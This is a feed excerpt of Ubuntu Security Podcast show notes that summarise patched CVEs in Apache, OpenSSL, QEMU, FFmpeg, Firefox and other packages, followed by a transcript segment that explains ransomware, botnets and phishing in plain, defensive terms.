<h3 id="usn-5487-1-apache-http-server-vulnerabilities-08-28">[<a href="https://ubuntu.com/security/notices/USN-5487-1">USN-5487-1</a>] Apache HTTP Server vulnerabilities [08:28]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31813">CVE-2022-31813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30556">CVE-2022-30556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30522">CVE-2022-30522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29404">CVE-2022-29404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28615">CVE-2022-28615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28614">CVE-2022-28614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26377">CVE-2022-26377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Request smuggling, RCE, DoS, expose sensitive info etc</li>
</ul>
<h3 id="usn-5488-1-openssl-vulnerability-08-53">[<a href="https://ubuntu.com/security/notices/USN-5488-1">USN-5488-1</a>] OpenSSL vulnerability [08:53]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2068">CVE-2022-2068</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><code>c_rehash</code> - very similar to <a href="https://ubuntu.com/security/CVE-2022-1292">CVE-2022-1292</a> (<a href="https://ubuntusecuritypodcast.org/episode-159/">Episode 159</a>) - possible code
execution if running it against certificates with crafted file names -
unlikely anyone is doing this in practice, plus upstream say this is
deprecated and instead should just use <code>openssl rehash</code> instead</li>
</ul>
<h3 id="usn-5489-1-qemu-vulnerabilities-09-57">[<a href="https://ubuntu.com/security/notices/USN-5489-1">USN-5489-1</a>] QEMU vulnerabilities [09:57]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26354">CVE-2022-26354</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26353">CVE-2022-26353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0358">CVE-2022-0358</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4207">CVE-2021-4207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4206">CVE-2021-4206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3929">CVE-2021-3929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3507">CVE-2021-3507</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various guest -&gt; host issues via emulation drivers for various devices
(floppy disk, NVME controller, QXL display device, virtio-net,
vhost-vsock etc)
<ul>
<li>crash host QEMU, code execution, change file ownership</li>
</ul>
</li>
</ul>
<h2 id="decoding-cybersecurity-buzzwords--part-1--10-45">Decoding cybersecurity buzzwords (part 1) [10:45]</h2>
<ul>
<li>From ransomware to botnets and phishing, Camila dives into the details on
some of the most prolific buzzwords flying around the cybersecurity
community</li>
</ul>
<h3 id="transcript">Transcript</h3>
<p>Hello listener! Welcome to another segment o&rsquo;mine in the Ubuntu Security
Podcast! It&rsquo;s been a while, but I have returned to bring some real buzz
into today&rsquo;s episode! How, you might ask? The buzz will come from the
buzzwords we will be exploring&hellip;cyber security buzzwords to be more
specific. Let&rsquo;s start by defining what a buzzword is, for those who might
not know this term: a buzzword is a word - or a term - that, as the name
suggests, is currently buzzing. It&rsquo;s a word that is popular within the
scope of its usage. Everyone says it all the time, and it seems like you
can&rsquo;t escape it. The most popular articles about topics in a specific field
use it every other sentence, people put them in big, bold and shiny letters
right there on the title of their scientific papers, and even your baby&rsquo;s
first words end up being that buzzword because they end up hearing it more
than the eternal and classic infant buzz phrase &ldquo;Say mama!&rdquo;. A buzzword is,
therefore, a fashionable word at a specific point in time. Every field has
its own, and cyber security is not exempt from them. Today, I want to
actually explore some of the cyber security buzzwords we have and actually
try to demystify them, as buzzwords can become something much more absurd
or grandiose than they actually are just because everyone is choosing to
use them. I think we all remember the era of the super low-rise jeans and
can agree (or maybe agree to disagree) that just because something is being
used by everyone out there, it does not mean it deserves all the hype…of
course that is my own opinion on the subject matter that is low-rise
jeans. As for the buzzwords, the statement stands! So, let&rsquo;s bring up some
of these super duper amazingly popular buzzwords in to play here, let&rsquo;s
actually define what they are for the ones out there that might not be
cyber-security wizards, and let&rsquo;s remove the buzzing that these buzzwords
might have brought into our minds, shall we?</p>
<p>Buzzword #1: ransomware. Aaah, ransomware. You see this simple and yet
deadly word everywhere. &ldquo;Defend yourself against ransomware!&rdquo;, &ldquo;Ransomware
might be just around the corner!&rdquo;, &ldquo;No need to fear ransomware
anymore!&rdquo;. It was the dawn of 2017 when ransomware became a thing to people
outside of the cyber security community because of the infamous WannaCry
malware. That picture with a red pop-up window telling you that all of your
files had been encrypted and could only be recovered after some type of
crypto currency payment was made to the attackers was absolutely
everywhere! And after that, the ransomware wave only got stronger, with new
and improved types showing up all the time, an honorable mention being the
Petya variants. Anyway, since WannaCry was such a big deal at the time, and
people were so scared of it after it left behind its trail of mayhem and
huge amounts of lost data, ransomware became THE word chosen by various
cybersecurity companies to describe that which is your main enemy in the
digital world, the supervillain in this installment of the cyber security
movie series that is actually our real lives. All defense tools now
implement some type of measure against ransomware, because if they don&rsquo;t,
you know that clients of said tool will ask &ldquo;but what about defending
against ransomware?&rdquo;, because that, my friends, is the buzzword that comes
to their minds. Like the word &ldquo;computer virus&rdquo; in the early 2000s. Computer
viruses still exist, but you don&rsquo;t see people freaking out about it
anymore, because now we have the &ldquo;antivirus&rdquo;. Phew, problem solved, right?
So no need to have this as a buzzword anymore. However, just like computer
viruses existed before the 2000s and still exist to this day, ransomware
also existed before WannaCry and much worse versions of it will continue to
exist while there still are vulnerabilities and hackers out there, which is
to say…probably forever. The only difference is, we now live in a time
where people seem to care about it a little bit more, maybe because they
are not implementing security measures to be safe against it, or at least
they are not doing it very well. But I am getting ahead of myself
here. Let&rsquo;s first talk about what ransomware really is, which is actually
something very simple to do: a ransomware is a malware, as a computer virus
is also a malware. A malware is a &lsquo;malicious software&rsquo;, or, in other words,
a software that executes in a computing device and that does things that
the owner of the device might not want it to do, like&hellip;for example,
encrypt all of your files and not allow you to access them. That is what
ransomware does, in most cases. The main idea is, a ransomware will be a
malicious software that will prevent you from accessing your files until
you pay some amount of money to the malicious entity that was able to get
that ransomware to run in your network devices in the first place&hellip;so,
until you pay a ransom to the kidnapper of your data. Of course this only
works if you have someone on the other side waiting to exchange the money
for the key that will decrypt your files, or else, you could simply have a
very destructive trojan, or worm, or whatever other malware that is
combined with the file encrypting functionality in order for the malicious
software itself to spread through the network before actually causing the
data harm it does. The question now is, whatever is the ransomware-hybrid
malware that targeted you and your network, the only way to recover the
data you lost, the data as it was during the time of total encryption, is
to pay the ransom. Should you? Cyber security professionals usually
recommend against paying ransom, as it only shows hackers that they can
continue launching ransomware attacks to get what they want. The correct
way to avoid your files from being forever lost after your network has been
infected by one of these nasty malwares is to recover data from the backup
server you set up&hellip;you did set up a backup server to store the backup for
all of your company data, right? I know, I know&hellip;not always it will be the
case that people will be able to set backups, and then, recovering all that
is lost might be a much more difficult task if you decide to not pay the
ransom. But come on&hellip;we live at a time where cyber security should no
longer be put in the benches, and you should be highly concerned about
possible attacks, especially attacks related to the ever popular buzzword
ransomware. Save some of your budget for backups, you won&rsquo;t regret it.</p>
<p>Buzzword #2: botnets. &lsquo;Botnet&rsquo; is an interesting buzzword because it opens
the door to many other tech buzzwords that are in everyone&rsquo;s minds out
there right now&hellip;like crypto mining, for example. Why? Because you can use
botnets to perform crypto mining&hellip;you can also use botnets to spread
malware, including ransomware. Oh&hellip;and botnets&hellip;their participants
usually include lots of IoT devices! BAM, another buzzword right there! Now
would you look at that! Seems like instead of a buzzword, we actually have
a buzzword magnet in our hands ladies and gentlemen. So&hellip;yes, maybe
&lsquo;botnet&rsquo; is not the hottest buzzword out there right now, but I decided to
include it in the list because I feel like it is a disguised buzzword. What
do I mean by disguised? It&rsquo;s the word that is in the subtitle for an
article named &ldquo;CRYPTO MINING HACKER GANG CAUSES DAMAGES TO COMPANY X&rdquo;, or
the word that is implied in a video that is named &ldquo;IoT DEVICE Y SECURITY
VULNERABILITY ONCE AGAIN EXPOSED BY MASSIVE DENIAL OF SERVICE ATTACK&rdquo;, or
even the word that is a part of a title or a conversation about cyber
security, cyber attacks and vulnerabilities, but it might not be the one in
big bold flashy fonts, like it was the case for our dearest friend
ransomware. But it all comes back to the botnets eventually. So what is a
botnet? As the name suggests, it is a network of bots! Wooow, could I get a
round of applause for that definition, please and thank you very much! When
we think about a robot, we think about a technological humanoid that speaks
in a digitalized voice and obeys commands without question, unless they are
actually trying to take over the planet and overthrow human supremacy&hellip;but
that is a topic for another podcast to maybe discuss. The point here is:
what is a computer if not a robot? No, it does not possess humanoid form
most of the time, but it does communicate with us through a digital screen
and it will execute commands that the software it is running tells it to,
this software being created and programmed by a human
being. So&hellip;yes&hellip;robots are computers, computers are robots, or at
least&hellip;fancy humanoid robots and even cute round cleaning robots need
computers to exist and computers are the basis to create a robot. So when
we say botnet, we are actually referring to a network of computers. A
network of computers, or a group of computers, which are all performing
some type of common activity, executing software with the same purpose… and
unfortunately for us, in this case it is a malicious purpose. Botnets are
created through the infection of computing devices. A hacker releases
malware on the Internet and this malware is able to propagate, infecting
various devices connected to our fairest of ladies, usually devices that
are vulnerable to some type of specific vulnerability. So, yes, once again
we have malwares being a problem and ruining our days…surprise,
surprise. Once infected, the device becomes a robot, a &ldquo;mindless&rdquo; soldier
in an army of many that will respond to a hacker, most likely the one that
created the malware. It connects back to this hacker, usually sending some
type of short and sweet - bitter sweet for us, that is - message to a
command and control server, which we can see as an HQ, but is actually
nothing more than an attacker controlled device. And then&hellip;it waits. It
continuously calls home to indicate that it is a part of the malicious
group of infected devices that are &ldquo;at the hacker&rsquo;s service&rdquo;, and it
expects to eventually receive a message that will contain instructions
which will give it an attack target and an attack to launch on that
target. The malware that is running on the infected device, our bot, will
contain the code or will receive and process the code that will allow this
attack to be carried out, and then we have a huge amount of possibilities
that we can consider for this attack, one of them being: the bots could be
instructed to send absurd amounts of data through the network to a specific
target. The target device gets overwhelmed and the service it provides
through the network can no longer be accessed by legitimate users because
the device crashes. This is a denial of service attack, which is very hard
to stop at the source, as you have thousands of sources, most of which the
device owners don&rsquo;t even have malicious intent. The devices got hacked and
are secretly and mercilessly being used to the advantage of the
attacker. Granted&hellip;the reason for the infection, the presence of the
vulnerability that initially caused this could be the owner&rsquo;s fault. Maybe
they wouldn&rsquo;t have been unwillingly attacking the server of their favorite
website had they applied that patch that recently came out for a critical
vulnerability, however, you can&rsquo;t really call them the mastermind of it all
when all they did was keep a vulnerable computer, can you? Anyway, I might
leave that philosophical question for a later time…for now, another well
known use for botnets is crypto mining. Infect, divide and profit! Why use
your own computer and your own resources to mine crypto currency when you
have hundreds of thousands of unpatched IoT devices at your disposal to
mine for you? That&rsquo;s what the hackers think&hellip;not me….just to be veeeery
clear. A botnet can also be used to spread ransomware. The bots worry about
creating other bots as well as infecting devices in their own local
networks that might make a hacker profit from a ransomware attack. And it
all ties in beautifully to create the most amazing of buzzword sentences:
Phishing campaign allows for creation of ransomware botnet!
Oh&hellip;wait&hellip;there is a buzzword in there we have yet to talk about&hellip;</p>
<p>Buzzword #3: phishing! Did you like how I introduced this one by just
name-dropping it previously? Since I gave it such a direct introduction,
let&rsquo;s also give it a direct definition. Phishing is a type of social
engineering attack where an attacker throws what we can only call as the
equivalent to &ldquo;bait&rdquo; into the Internet “ocean” in hopes of hooking some
&ldquo;fish&rdquo;, in their fishing rods. So&hellip;the &ldquo;fish&rdquo; are like the victims of the
attack, if that wasn&rsquo;t clear enough for you&hellip; Our situation therefore, is
kind of like real fishing, but in a different context, because here we are
looking at people getting fooled into clicking on links that will cause
them to access malicious websites, and then share sensitive information
like passwords and credit card numbers through that website, all because
they get fooled into doing it by a very clever attacker which is using of
their social engineering skills achieve this. They could also simply get
fooled into responding directly to a well crafted message with sensitive
information they wouldn&rsquo;t even share with their own diaries! Or maybe just
with their diaries, but not other people. The question which remains is:
what is social engineering? To put it simply, a social engineer is someone
that knows how to &ldquo;hack&rdquo; the human psyche. To put it not so simply, it is
the art - can I call it that? - of manipulating other people into doing
something they might not want to have done in the first place. So, every
spy movie when you see the almighty main character get into a building they
shouldn&rsquo;t by fooling the guard and making them believe they actually work
there because they are wearing a fancy suit and spilling out complex terms
to a phone&hellip;well that is social engineering. The super spy plays the part
and gives no time for the guard to think too much about whether they are
actually a legitimate authorized person or not, because when the guard
starts questioning it, they emphatically say something in the lines of &ldquo;Oh
my god&hellip;I am going to be late to my meeting and you do not want
Mr. Whatever to hear about this&rsquo;. Mr. Whatever is an actual big boss around
the place and Mr. Guard worries he will get fired if he doesn&rsquo;t comply
immediately, so just this time, he skips the ID checking phase of the
process to let super spy waltz into the building unscathed. His fear of
getting fired was used against him in order to make him do something he
wouldn&rsquo;t do were he thinking clearly, not affected by emotion: skip a part
of the identification process of a person wanting to access the
building. When we talk about spy movies of course we have a much more
interesting example than when we are talking about actual phishing
campaigns, but the underlying idea is the same in both. The difference is,
in phishing attacks, a hacker will usually send an e-mail or a text message
to a bunch of random people with a message that will toy with their
emotions somehow. They focus on quantity instead of quality because
eventually someone is bound to be freaked out by the email they get saying
that their bank account will be closed if they don&rsquo;t immediately click the
link in the message and change their password using the form provided. They
click the link without paying attention to the website URL, which is not at
all related to the one of their bank’s actual website, and are redirected
to a webpage which looks exactly like the password changing page you would
get had you accessed this legitimate bank website. They input their data,
which is quickly sent to the attacker, because they are the actual entity
controlling the device behind said website, and now, this attacker has the
password to this person&rsquo;s bank account. Fishing rod: fake email sent to
thousands of people saying the bank will close accounts that don&rsquo;t change
their passwords. Bait: the human feeling of desperation one might get when
thinking about having their bank account suddenly be inaccessible, caused
by the wording and official looking appearance of the email message that
was sent. Fish who bite on that bait: people who believe this message and
don&rsquo;t pay too much attention to the signs that indicate that it is
fake. Most times, people who are not that tech savvy and don&rsquo;t even know
how it is possible that a fake website could have the same appearance as
the one from the actual bank. If it looks like the bank webpage, it can
only be the bank webpage…right? So&hellip;yes, I am unfortunately talking about
all of the grandmas out there, which end up being a very common victim of
these types of attacks. But do not get me wrong. I am not saying here that
if you are not a grandma that you are unaffected by phishing
attacks. Social engineering techniques go way beyond fear or desperation,
and anyone can be a target should a hacker strike the correct emotions on
this target. Remember a certain Nigerian prince who was asking for a small
sum of money only to return 10 times this amount to you as soon as their
investment worked? Greed can also be your downfall. So the main tip for
those that are worried about falling for phishing scams is simple: if
something looks like it is too good to be true, it probably is. Also&hellip;if
something seems too crazy to be true, maybe ask trustworthy people related
to the craziness in question if that message you are receiving is indeed
legitimate. So&hellip;for our bank situation, call your bank manager! Have more
than one information source and breathe before making any harsh decisions
and clicking the link that will ask you for your credentials or for any
kind of sensitive information for absolutely no reason! I mean…why do you
need my credit card number if I am not actually buying anything? Think
before you type! That is the best way to not be that sad struggling fish at
the mercy of some hook.</p>
<p>Well friends, sadly, we have reached that point of the episode which will
actually transform this into a series instead of leaving it as a single
episode, since I am unable to write a small script. Oops, sorry about that!
We will continue on this journey next week, where I will talk about some
other interesting buzzwords you might have heard when out and about. No
spoilers though, as it might ruin the fun of it! I await you all in the
next episode of this series. For now, feel free to share any of your
thoughts on this episode in any of our social media channels! I bid you all
farewell and until next time! Bye!</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E165.mp3" length="21987701" type="audio/mpeg" /><itunes:duration>2051</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 164
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-164/</link>
          <pubDate>Fri, 17 Jun 2022 19:17:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>3ae25f6f37c5cadc9898038d54b3f94bb44ae39757365c96ff47956f056a7290c39fdf2e8f4565751021bb25e3698f5221352c86135c1866d88aa4a3a45d7ec2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 164</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          More Intel CPU issues, including Hertzbleed and MMIO stale data, plus we
  cover security vulnerabilities and updates for ca-certificates, Varnish
  Cache, FFmpeg, Firefox, PHP and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  More Intel CPU issues, including Hertzbleed and MMIO stale data, plus we
  cover security vulnerabilities and updates for ca-certificates, Varnish
  Cache, FFmpeg, Firefox, PHP and more.
  </itunes:summary>
        <description>  More Intel CPU issues, including Hertzbleed and MMIO stale data, plus we
  cover security vulnerabilities and updates for ca-certificates, Varnish
  Cache, FFmpeg, Firefox, PHP and more.
  </description>
        <googleplay:description>  More Intel CPU issues, including Hertzbleed and MMIO stale data, plus we
  cover security vulnerabilities and updates for ca-certificates, Varnish
  Cache, FFmpeg, Firefox, PHP and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>More Intel CPU issues, including Hertzbleed and MMIO stale data, plus we
cover security vulnerabilities and updates for ca-certificates, Varnish
Cache, FFmpeg, Firefox, PHP and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>64 unique CVEs addressed</p>
<h3 id="usn-5473-1-ca-certificates-update-00-41">[<a href="https://ubuntu.com/security/notices/USN-5473-1">USN-5473-1</a>] ca-certificates update [00:41]</h3>
<ul>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)</li>
<li>Updates to the latest 2.50 version of the Mozilla CA bundle - in
particular this removes a bunch of expired certs plus an old (but still
valid) GeoTrust certificate and others - also adds some new CA certs from
GlobalTrust, Certum, GlobalSign too</li>
</ul>
<h3 id="usn-5396-2-ghostscript-vulnerability-01-30">[<a href="https://ubuntu.com/security/notices/USN-5396-2">USN-5396-2</a>] Ghostscript vulnerability [01:30]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-25059">CVE-2019-25059</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-158/">Episode 158</a></li>
</ul>
<h3 id="usn-5474-1-varnish-cache-vulnerabilities-01-41">[<a href="https://ubuntu.com/security/notices/USN-5474-1">USN-5474-1</a>] Varnish Cache vulnerabilities [01:41]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23959">CVE-2022-23959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-36740">CVE-2021-36740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11653">CVE-2020-11653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20637">CVE-2019-20637</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Luís Infante da Câmara for preparing, testing and providing the
debdiff&rsquo;s for these updates
<ul>
<li>Possible HTTP/1 and HTTP/2 request smuggling attacks</li>
<li>DoS via triggering an assertion failure</li>
<li>Pointer of one client reused on the next if both share the same
connection - can expose info from the old client to the new one</li>
</ul>
</li>
</ul>
<h3 id="usn-5472-1-ffmpeg-vulnerabilities-02-30">[<a href="https://ubuntu.com/security/notices/USN-5472-1">USN-5472-1</a>] FFmpeg vulnerabilities [02:30]</h3>
<ul>
<li>35 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38291">CVE-2021-38291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22025">CVE-2020-22025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1475">CVE-2022-1475</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38171">CVE-2021-38171</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38114">CVE-2021-38114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35965">CVE-2020-35965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22037">CVE-2020-22037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22035">CVE-2020-22035</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22030">CVE-2020-22030</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22029">CVE-2020-22029</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22027">CVE-2020-22027</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22033">CVE-2020-22033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22021">CVE-2020-22021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22019">CVE-2020-22019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22042">CVE-2020-22042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22036">CVE-2020-22036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22034">CVE-2020-22034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22032">CVE-2020-22032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22031">CVE-2020-22031</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22028">CVE-2020-22028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22026">CVE-2020-22026</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22025">CVE-2022-22025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22023">CVE-2020-22023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22022">CVE-2020-22022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22020">CVE-2020-22020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22017">CVE-2020-22017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22016">CVE-2020-22016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-22015">CVE-2020-22015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21697">CVE-2020-21697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21688">CVE-2020-21688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21041">CVE-2020-21041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-20450">CVE-2020-20450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-20453">CVE-2020-20453</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-20446">CVE-2020-20446</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-20445">CVE-2020-20445</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Luís Infante da Câmara for preparing, testing and providing the
debdiff&rsquo;s for these updates</li>
<li>Updates ffmpeg to latest upstream bug-fix releases
<ul>
<li>4.4.2 for 21.10, 22.04 LTS</li>
<li>4.2.7 for 20.04 LTS</li>
<li>3.4.11 for 18.04 LTS</li>
</ul>
</li>
</ul>
<h3 id="usn-5475-1-firefox-vulnerabilities-03-04">[<a href="https://ubuntu.com/security/notices/USN-5475-1">USN-5475-1</a>] Firefox vulnerabilities [03:04]</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31748">CVE-2022-31748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31747">CVE-2022-31747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31745">CVE-2022-31745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31744">CVE-2022-31744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31743">CVE-2022-31743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31742">CVE-2022-31742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31741">CVE-2022-31741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31740">CVE-2022-31740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31738">CVE-2022-31738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31737">CVE-2022-31737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31736">CVE-2022-31736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1919">CVE-2022-1919</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>101.0.1</li>
<li>Usual mix of web browser / framework issues fixed - specially crafted
website -&gt; could exploit to cause DoS, info leak, spoof the browser UI,
conduct XSS attacks, bypass content security policy (CSP) restrictions,
or execute arbitrary code</li>
</ul>
<h3 id="usn-5476-1-liblouis-vulnerabilities-03-54">[<a href="https://ubuntu.com/security/notices/USN-5476-1">USN-5476-1</a>] Liblouis vulnerabilities [03:54]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31783">CVE-2022-31783</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26981">CVE-2022-26981</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Braille translation library + utils</li>
<li>Buffer overflow -&gt; crash -&gt; DoS</li>
<li>OOB write -&gt; crash -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5359-2-rsync-vulnerability-04-27">[<a href="https://ubuntu.com/security/notices/USN-5359-2">USN-5359-2</a>] rsync vulnerability [04:27]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-25032">CVE-2018-25032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-156/">Episode 156</a> (zlib memory corruption issue when compressing input data)</li>
</ul>
<h3 id="usn-5477-1-ncurses-vulnerabilities-04-54">[<a href="https://ubuntu.com/security/notices/USN-5477-1">USN-5477-1</a>] ncurses vulnerabilities [04:54]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29458">CVE-2022-29458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39537">CVE-2021-39537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17595">CVE-2019-17595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17594">CVE-2019-17594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19211">CVE-2018-19211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16879">CVE-2017-16879</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption vulns fixed - requires to process crafted input
files (e.g. termcap - but this is usually trusted so hence negligible
rating for most of these CVEs)</li>
</ul>
